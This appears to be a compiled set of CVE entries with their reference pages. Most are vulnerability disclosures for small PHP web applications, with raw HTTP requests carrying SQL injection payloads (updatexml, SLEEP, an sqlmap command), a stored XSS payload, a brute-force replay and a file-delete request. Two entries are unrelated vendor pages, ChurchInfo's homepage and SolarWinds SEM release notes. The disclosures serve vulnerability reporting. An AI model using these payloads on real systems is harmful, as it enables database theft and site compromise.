Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /asms/products/view_product.php.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: thir3een13

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/products/view\_product.php?id=

Vulnerability location: /asms/products/view\_product.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/products/view\_product.php?id=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/products/view\_product.php?id\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44858: bug_report/SQLi-1.md at main · thir3een/bug_report

Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /asms/admin/products/manage_product.php.

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: thir3een13

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/products/manage\_product.php?id=

Vulnerability location: /asms/admin/products/manage\_product.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/products/manage\_product.php?id=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/products/manage\_product.php?id\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44859: bug_report/SQLi-2.md at main · thir3een/bug_report

Improper Restriction of Excessive Authentication Attempts in GitHub repository wger-project/wger prior to 2.2.

**Description**

Wger Workout Manager does not limit unsuccessful login attempts allowing Brute Forcing.

**Proof of Concept**

_Steps to Reproduce:_

1.  Register a new user
    
2.  Logout
    
3.  Send a login request with an incorrect password
    
4.  Capture the login request
    
5.  Replay the login request with a different password value utilizing a password list payload
    
6.  Should the password exist in the password list, a FOUND "Reason" with a Code of "300" will be issued
    
7.  ZAP will continue attempting all passwords in the password list until complete
    

**OWASP ZAP (Zed Attack Proxy) captured request below**

    
    POST http://localhost:8002/en/user/login HTTP/1.1
    Host: localhost:8002
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 134
    Origin: https://localhost:8002
    Connection: keep-alive
    Referer: https://localhost:8002/en/user/login
    Cookie: csrftoken=dmYHzhEL7jtry2rAuRuXFvfRNfr1ZhKELoaBcBHiD21rMHik5aAno2aJ44SloIAq; sessionid=ezv3ryk6pdpjsruystkuy9igz6nvjcwg
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    csrfmiddlewaretoken=6XFt2tC2nJ1s57MtQOmsiBqDnWHylBfBEZRnFNFzTszsjMDdr7sS18lvEL8SK25n&username=username1&password=password&submit=Login
    

**Impact**

The impact is unlimited password attempts leading to Brute Force attacks on the login page. Should this software be hosted on a website, it may also lead to Denial of Service.

**Occurrences**

CVE-2022-2650: No Protection against Bruteforce attacks on Login page in wger

A cross-site scripting (XSS) vulnerability in the Url parameter in /login.php of EyouCMS v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

name：EyouCMS  
version: EyouCMS-V1.6.0-UTF8-SP1  
Installation package download：  

Problematic packets:

> POST /login.php?m=admin&c=Links&a=add&\_ajax=1&lang=cn HTTP/1.1  
> Host: 192.168.23.130:49160  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
> Accept: application/json, text/javascript, _/_; q=0.01  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 141  
> Origin: http://192.168.23.130:49160  
> Connection: close  
> Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn  
> Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin\_lang=cn; home\_lang=cn; ENV\_UPHTML\_AFTER=%7B%22seo\_uphtml\_after\_home%22%3A0%2C%22seo\_uphtml\_after\_channel%22%3A%221%22%2C%22seo\_uphtml\_after\_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV\_GOBACK\_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex\_archives%26typeid%3D5%26lang%3Dcn; ENV\_LIST\_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex\_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img\_id\_upload=; ENV\_IS\_UPHTML=0; imgname\_id\_upload=
> 
> typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo\_local=&logo\_remote=&province\_id=0&city\_id=&area\_id=&sort\_order=100&email=&intro=

Vulnerability recurrence

1.Log in to the background，Click "SEO module" ->"friendship link" ->"add link"  

2.input payload：javascript:alert(11)，Submit  
  
Click and trigger XSS after submission  
  

PS：The vulnerability will also be displayed on the home page and can be triggered by clicking

CVE-2022-45280: EyouCMS v1.6.0 existence stored cross-site scripting (XSS) · Issue #32 · weng-xianhu/eyoucms

Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /index.php/admins/Fields/get_fields.html component.

This is one of my favorite CMS, but I found a system vulnerability.  
name：jizhicms  
version: v2.3.3  
Installation package download：  
  
Problematic packets:

> POST /index.php/admins/Fields/get\_fields.html HTTP/1.1  
> Host: 192.168.23.130:49158  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
> Accept: _/_  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 21  
> Origin: http://192.168.23.130:49158  
> Connection: close  
> Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html  
> Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs
> 
> molds=tags&tid=0&id=1

Background ->SEO settings ->TGA list ->edit, and then capture packages  
  

  
Vulnerability verification exists

payload

    Parameter: molds (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3

CVE-2022-45278: jizhicms v2.3.3 has a vulnerability, SQL injection · Issue #83 · Cherry-toto/jizhicms

Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /Member/memberedit.html component.

**Issue**

SQL injection vulnerabilities exist under the function nodes of new members, and attackers can operate on databases

**Steps to reproduce**

1.  Log in to the background
2.  Click User Management>Member List>Add Member or Edit

Problematic packets:

    POST /index.php/admins/Member/memberedit.html HTTP/1.1
    Host: 192.168.150.136:85
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 241
    Origin: http://192.168.150.136:85
    Connection: close
    Referer: http://192.168.150.136:85/index.php/admins/Member/memberedit/id/1163.html
    Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1665907862; PHPSESSID=k7nc070b0c4h2f1kjo65l54aqf
    
    go=1&id=1163&username=xxxx&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19+19%3A34%3A02&logintime=2022-10-19+19%3A24%3A17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
    

use sqlmap: python2 sqlmap.py -r ss.txt --batch -current-db  

    
    ---
    Parameter: id (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: go=1&id=1163' AND (SELECT 3004 FROM (SELECT(SLEEP(5)))lPDg) AND 'fgEo'='fgEo&username=xxxx#&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19 19:34:02&logintime=2022-10-19 19:24:17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
    ---

CVE-2022-44140: jizhicms v2.3.3 has a vulnerability, SQL injection · Issue #81 · Cherry-toto/jizhicms

CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server.

**Looking for a Flagship Church**

The ChurchInfo team is looking for a flagship church to serve as a focal point for for the development team.  We know that many churches are using our software, and we want to cultivate a special relationship with at least one and possibly several churches to challenge and inspire us.

We can offer the following:

\- Free hosting on churchinfoservices.com, or support on the hosting service of your choice

\- Priority access to support from the development team

\- Priority consideration for the development of new features that are of special interest to your church

In return, we request the following:

\- Use all the features of ChurchInfo that make sense for your church.  ChurchInfo is designed to serve as your only membership database so you only need to maintain membership information in one place.

\- Tell us about any difficulties you have or suggestions for improvement.

The most satisfying thing about supporting the ChurchInfo open source project is knowing that churches can rely on this open-source alternative to expensive church management systems.  If you are looking for a new database solution, or perhaps your first database solution, press the "Contact Us" link toward the upper-right part of this page to inquire.

**Inexpensive Hosting Service Now Available**

After more than twelve years as a purely volunteer venture ChurchInfo has teamed up with a small company called ChurchInfo Services to provide hosting service and automated installation.  This service is designed to be an inexpensive option for churches that don't have access to the necessary technical skills to build and maintain their own installations.  There is no change to the core mission and values of the ChurchInfo project.  The goal is to expand the availability of ChurchInfo to more churches, especially those which found the initial installation to be too much of a hurdle.

Here is a link to the ChurchInfo Services web site.

**Upgrading ChurchInfo**

All versions of ChurchInfo since 1.2.7 are designed to upgrade the database automatically.  Here are the steps to complete the upgrade process:

*   Back up your database using phpMyAdmin.  Select your ChurchInfo database from the list to the left, then select the export tab across the top to the right.  The default export options should be fine and it should give you a copy of your entire database in a ".sql" file.
*   Make a copy of your old file Include/Config.php.  This file contains the database configuration settings near the beginning of the file.
*   If you have been uploading images make a copy of your Images directory with the sub-directories Person, Person/thumbnails, Family, and Family/thumbnails.
*   Extract the ChurchInfo distribution from the .tar.gz file of the .zip file.
*   Copy the new files over your previous installation, making sure they wind up in the same place.  FileZilla is good about doing this recursive upload copy if you need to use FTP.
*   Transfer the database settings from your saved copy of Include/Config.php to the new installation.
*   Log in as usual.  The first thing it will do is upgrade the database, then the new version will be operational.

If you prefer, you can rename your installation directory to set it aside and then install the ChurchInfo distribution into the original installation directory.  If you install this way you will need to copy any image files from the renamed installation directory to the same spot in the new installation.

**Release 1.3.0 Available Now****Major new feature: Self-Service Interface**

The self-service interface allows members to maintain their own personal  
information, enter pledges and electronic payment methods, and make immediate  
or scheduled electronic donations.  This interface is designed to be easily  
embedded in a church web site or it can run stand-alone.  The starting point  
for the self-service interface is SelfRegisterHome.php.

**Support for newer versions of PHP and MySQL (now MariaDB)**

The developers of PHP have obsoleted the mysql library that was used in  
previous versions of ChurchInfo.  This release uses the newest library for  
compatibility with PHP 7.  Many of the developers of MySQL have moved to  
a new purely open-source database called MariaDB which is based on MySQL and  
fully compatibly with ChurchInfo.  Several of the query constructs used in  
previous versions of ChurchInfo are now unsupported and have been updated  
in this release.

**Electronic donations through Vanco**

The new self-service interface supports electronic donations through Vanco  
only.  There will probably be another release soon to support Authorize.NET  
and perhaps Moneris if there is interest.

**Numerous bug fixes and minor improvements**

There are numerous bug fixes and minor improvements in this release.  Details  
are in the Git repository "CodeGit" on SourceForge.

**Moving ChurchInfo**

I often get this question- "How can I move ChurchInfo from one server to another?"  Fortunately, the process for moving ChurchInfo is pretty easy:

\- Use phpMyAdmin to back up the entire database to a sql file  
\- Copy the entire file structure under the churchinfo directory to the new server  
\- Use phpMyAdmin on the destination to create the ChurchInfo database, populate it using the back-up file rather than running SQL/Install.sql  
\- Edit the file Include/Config.php on the destination to establish the database connection on the new server  
\- Log into ChurchInfo on the new server

The only tricky step is editing Include/Config.php.  Hosting services tend to have different and incompatible rules about how databases and database users are named, and the database host may be different from "localhost".

This process transfers everything so all the same logins will still work on the new server.

The nature of the servers does not matter as long as Include/Config.php contains the necessary database connection information.  For my own church I frequently bring the database back to a PC running xampp to try things that I would not try on the active server.

**Read Before Downloading**

ChurchInfo is a web server application, which is nice because you can use it from anywhere with a browser but it isn't your typical download/install application.  If you just want to run stand-alone on a PC please read the article below "Simple Installation on Windows".  You can get the server infrastructure from xampp and then browse to localhost.  The general instructions for installing on any server are in the distribution file Documentation/Readme.txt.  There is a shared demo running on our web site; see article below "Try our demo".  You can also register for a private demo that will run for a few weeks.  See the article below "Private Demos Now Available".  Your experience running a demo on our web site will be exactly the same as running your own installation.  If you have any trouble with the shared demo, or a private demo, please use the "Contact Us" link above and tell us what happened.  We can normally fix issues with the demos the same day.

If you want to use a commercial server please do not use GoDaddy.  Their servers seem to be overwhelmed and trying to use the admin interface is terribly frustrating.

**Demonstration Videos****Introduction Video**

This is a very quick demonstration video showing operation of our demo installation.  You can use the demo any time starting from the link near the bottom of this page.  If the shared demo gets too messed up please send me a message and I will reset it.

Watch introduction

**Self-Service Features Video**

This video uses the nightly build demonstration to show off the new self-services feature in release 1.3.0.  The nightly build is reset every night so it is a good place to do experiments starting from a fresh installation.

Watch self-service

**Financial Features Video**

A lot of people have been watching the quick introduction video so I decided to make another one focusing on the deposit slip.  I get a lot of questions about the financial features of ChurchInfo and this video answers many of the most common questions.  If you would like to see more videos for other subjects please use the contact link to send me email.

Watch financial features  

**Installation Demonstration**

This new video shows the latest version of ChurchInfo being installed on a free server service.

Watch Installation on Free Server

These two videos take you through the entire process of installing on a commercial server.  These videos are older and the server services have improved since the videos were made.  The free server installation above is more representative of modern server services.

Watch installation

Watch test and debug

**Auction Automation**

This video is about using the ChurchInfo FundRaiser feature to facilitate an auction event.

Watch Auction

**Private Demos Now Available**

We can now host private demo installations to facilitate your evaluation process.  These demo installations are created in randomly named directories.  The purpose of these private demos is to give you a chance to experiment in your own space.  You can enter a little data, show your minister and your treasurer how it works, without having to worry about someone changing the admin password or deleting half the menu options.  Your demo space will be private but not particularly secure or permanent.  Please don't put a lot of work into it as it will be deleted in about a week unless you ask for more time.  Assuming your evaluation goes well please plan to download and install in your own world as soon as possible.

Please don't put nonsense for contact information.  Your contact information will only be used to communicate about ChurchInfo and will not be shared or sold for any other purpose.  If you put nonsense in the Private Demo Form your demo will probably be recycled soon and you will get Error 404 page not found while trying to use your private demo.

To get started with your private demo use this link: Private Demo Form

If you have any trouble with the private demo please use the "Contact us" link at the top of the page and tell us what happened.  We should be able to fix it for you.

**To our international users**

You can set the language by changing sLanguage in Admin->Edit General Settings.  ChurchInfo currently supports the following settings: de\_DE (German), en\_AU (Australian English), fr\_FR (French, not updated recently), it\_IT (Italian, not updated recently), nl\_NL (Dutch), pt\_BR (Brazilian Portuguese), sv\_SE (Swedish).  If you would like to develop a new translation please let me know!

**Try our Demo**

We have a demo installation of the latest version 1.3.0 available here The self-service interface for this demo installation is here.

Feel free to play with this database to see if ChurchInfo will work for your church. The password for this demo database is: “demoadmin” for Admin.  See the links below if you find a bug or want to discuss an issue.

**Help Test The Very Latest from the Development Team**

There is an automatically updated installation directly from our Git source control server here.  Please play with this version and report any issues in the bug trackers.  Log in with user name admin, password demoadmin.  No other logins are configured automatically.  If you prefer to take the very latest to your own playground this installation archive .tar.gz file is updated nightly: churchinfo-latest.tar.gz.

**Simple Installation on Windows**

I often get request from people who want to quickly install ChurchInfo on a computer running Windows.  This is a great way to get started and experiment, although the real power of ChurchInfo is best appreciated when it is running on a server and accessed from multiple different computers.  I use this procedure to install ChurchInfo for experimenting or development on a Windows laptop.

I have had good luck hopping back and forth between this stand-alone installation as a real server, simply using phpMyAdmin to back up and restore the database.

Here are the step-by-step instructions:

Install xampp for Windows.  This provides Apache, PHP and MySQL.  I tell it to run Apache and MySQL as services.

Unpack the churchinfo directory from the distribution into the directory C:\\xampp\\htdocs\\churchinfo  
Use Firefox or Chrome to browse to: http://localhost  
Click the phpMyAdmin link  
Select the Privileges tab  
Press Add a new user

Set User name to "churchinfo", Host to "localhost", Password to "churchinfo", Re-type to "churchinfo", enable "create database and assign all priviledges; them press Go (bottom-right)  
Select the new churchinfo database from the link to the left  
Select the Import tab  
Press Browse...  
Navigate to C:\\xampp\\htdocs\\churchinfo\\SQL\\Install.sql and choose this file  
Press the Go button  
Now browse to: http://localhost/churchinfo  
Log in with user name "admin", password "churchinfoadmin"  
It will ask you to change the password immediately.

CVE-2021-43258: ChurchInfo open source church database created with PHP & MySQL! - ChurchInfo open source church database created with PHP & MySQL!

This vulnerability occurs when a web server fails to correctly process the Content-Length of POST requests. This can lead to HTTP request smuggling or XSS.

Release Date: November 22, 2022

This document summarizes new features, improvements, and fixed issues in Security Event Manager (SEM) 2022.4, additional features, and upgrade notes and workarounds for known issues.

**New in SEM 2022.4****Added features and improvements**

*   **Import and Export of Rules**
    
    Administrators can export rules from SEM to a JSON file, and all users can import rules on the Configure > Rules page.
    
*   **Export nodes**
    
    All or selected node information can be exported as a CSV file on the Configure > Nodes page.
    
*   **Improved Saved and Schedule Query options**
    
    The Save and Schedule options are now consolidated under one menu.
    
*   **Query Tags and Thresholds**
    
    SEM 2022.4 introduces query tags and thresholds. These are used to group queries and determine the severity level and colors for two new dashboard widgets: Scheduled query severity, and Scheduled query table severity.
    
    To set the tags and thresholds for a query:
    
    1.  Select the required query in the left column of Historical Events.
    2.  Click Option and select Edit saved query.
    3.  Click Add tag. Queries can be assigned one or more tags.
    4.  Select the Thresholds tab. At least one tags must be added before you can set thresholds.
    5.  Set the number of results per evaluation you want to indicate warning and critical severity.
    
    For more information about tags, thresholds and the scheduled event severity dashboard widgets, see Historical Events section of the SEM 2022.4 Administrator Guide.
    

*   **HTTPS is permanently enabled**
    
    The togglehttp command has been removed from the CMC manager options. If HTTP has been enabled prior to upgrading to 2022.4 it will be disabled.
    
*   **Improved Remote Agent Installer credentials dialog**

For system requirements, see SEM 2022.4 System Requirements.

If you are looking for previous release notes for SEM, see Previous Version documentation.

**New customer installation**

For information about installing SEM, see the SEM Installation Guide and the SEM Getting Started Guide.

SolarWinds advises that, as a best practice, the SEM appliance should not be set up to be available to the Internet or any public-facing network. In addition, using this practice will help prevent access by unauthorized users. For further information on SEM security, see the SEM security checklists.

**Before you upgrade****Migrate LDAP connectors (introduced in SEM 2020.4)**

It is recommended that users remove any ambiguity in their Directory Service Tool connector configurations to allow migration to run as smoothly as possible. This can be by ensuring only one Directory Service Tool connector configuration is set up per domain.

All Directory Service Tool connectors are removed in process of the migration.

**Upgrade agents**

For AIX, HPUX and Solaris, agents installers now only contain custom Java; this means customers need to install Java themselves as a prerequisite.

1.  Upgrade Java installation to the latest version. See System Requirements for supported versions.
    
    For AIX agents, see Known Issues - AIX agent not connected after SEM upgrade.
    
2.  Upgrade SEM agents using latest custom Java installer.

**Upgrade Manager appliance**

For Windows systems, upgrade the Manager appliance with OpenJDK 17.0.3 or later.

**How to upgrade**

If you are upgrading from a previous version, use the following resources to plan and implement your upgrade.

SEM  must be upgraded to 2020.2 or 2020.2.1 before upgrading to 2022.4. To upgrade from earlier versions, see the SEM Upgrade Path to help you plan and execute your upgrade.

Download the upgrade package from the SolarWinds Customer Portal.

**CMC**

Since SEM 2020.4, a password is required to access the CMC command-line interface. The default CMC password is password. See Change the SEM CMC password for instructions on changing this.

**File system consistency check (fsck)**

During your upgrade, the system may run a fsck check during reboot. This can last 30 or more minutes depending on the quantity of data in the data partition. With the Debian version upgrade, the file system is configured to initiate the check when certain conditions are met:

*   21 mounts since the last check (during the 22nd reboot)

Or:

*   Six months since the last check

**Supported connectors**

The list of currently supported connectors can be found here.

**Fixed issues**

SEM 2022.4 fixes the following issues:

 

Case Number

Description

01119251

Remote agent installation does not display credentials.

01087657, 01077235, 01098824

OpenJDK issue resolved.

01066283, 0106346

Windows agent issue after update resolved.

00686391, 00976672, 0721268

Issue fixed where agent was not sending logs.

00997061, 00815612, 00929072, 00667624, 00823710, 01083879

Issue where alert fired multiple times in specified timeframe instead of once resolved

**SolarWinds CVEs**

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-38113

Information Disclosure Vulnerability

This vulnerability discloses build and services versions in the server response header.

Low

 

CVE-2022-38114

Client Side Desync Vulnerability

This vulnerability occurs when a web server fails to correctly process the Content-Length of POST requests. This can lead to HTTP request smuggling or XSS.

Low

Ken Pyle CYBIR

CVE-2022-38115

Insecure Methods Vulnerability

Insecure method vulnerability in which , allowed HTTP methods are disclosed e.g., OPTIONS, DELETE, TRACE, and PUT

Low

 

SolarWinds would like to thank our Security Researchers for reporting on these issuse in a responsible manner and working with our security, product, and engineering teams to fix the vulnerabilities.

**Third Party CVEs**

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2009-2409

SHA-1 Collision Vulnerability

The Network Security Services (NSS) library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spoof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time.

The scope of this issue is currently limited because the amount of computation required is still large.

Medium

**Known issues**

In SEM Reports, problems occur setting schedule times in Spanish format

**Issue:** When the Spanish format has been selected in SEM Reports, user is unable to specify whether schedule times are AM or PM.

**Resolution/Workaround:** Set Format to English (World) when specifying schedule times.

USB Defender service stops working after local policy USB detached

**Issue:** When USB Defender with Local policy is set up. A USB device that is not on Local policy whitelist is inserted and successfully disconnect by USB Defender. However, when reinserted and successfully ejected once or more than ten times the service fails.

**Resolution/Workaround:** None.

\[Rules builder\] \[Email templates\] - Not possible to select Event Data in Email action for rule with single condition and occurrence settings

**Issue:** After selecting Send Email Message in a single condition event rule, and selecting an email template, you cannot select Event Data as value for the parameter.

**Resolution/Workaround:** The rule must be triggered by one event only.

*   **Unable to install MacOS agent on BigSur**

**Issue:** Unable to install the MacOS agent on BigSur.

**Resolution/Workaround:** Execute/start the customJava installer, kill it, and then execute the agent installer with bundled java.

*   **"Set time when a rule won't trigger actions after rule was true" not working**

**Issue:** "Set time when a rule won't trigger actions after rule was true" functionality in rules does not work.

**Resolution/Workaround:** None.

   

Version

EOL

Announcements

EOE Effective

dates

EOL Effective dates

6.7

**May 18, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 6.7, 6.7.1, and 6.7.2 should begin transitioning to the latest version of SEM.

**August 18, 2021:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 6.7, 6.7.1, and 6.7.2 will no longer be actively supported by SolarWinds.

**August 18, 2022:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 6.7, 6.7.1, and 6.7.2.

2019.4

**April 19, 2022:** End-of-Life (EoL) announcement – Customers on SEM versions 2019.4, and 2019.4.1 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2019.4, and 2019.4.1 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2019.4, and 2019.4.1.

2020.2

**April 19, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 2020.2, 2020.2.1 and 2020.2.2 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2020.2, 2020.2.1 and 2020.2.2 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2020.2, 2020.2.1 and 2020.2.2.

2020.4

**April 19, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 2020.4, and 2020.4.1 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2020.4, and 2020.4.1 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2020.4, and 2020.4.1.

**Legal notices**

© 2022 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-38114: SEM 2022.4 Release Notes

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=user/manage_user&id=.

Permalink

Cannot retrieve contributors at this time

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: tpaer

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=user/manage\_user&id=

Vulnerability location: /php-sms/admin/?page=user/manage\_user&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=user/manage\_user&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=user/manage\_user&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44278: bug_report/SQLi-1.md at main · Onetpaer/bug_report

Automotive Shop Management System v1.0 is vulnerable to Delete any file via /asms/classes/Master.php?f=delete_img.

**Automotive Shop Management System v1.0 by oretnom23 has Delete any file**

BUG\_Author: tpaer

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Vulnerability File: /asms/classes/Master.php?f=delete\_img

Vulnerability location: /asms/classes/Master.php?f=delete\_img, path

Payload:

POST /asms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
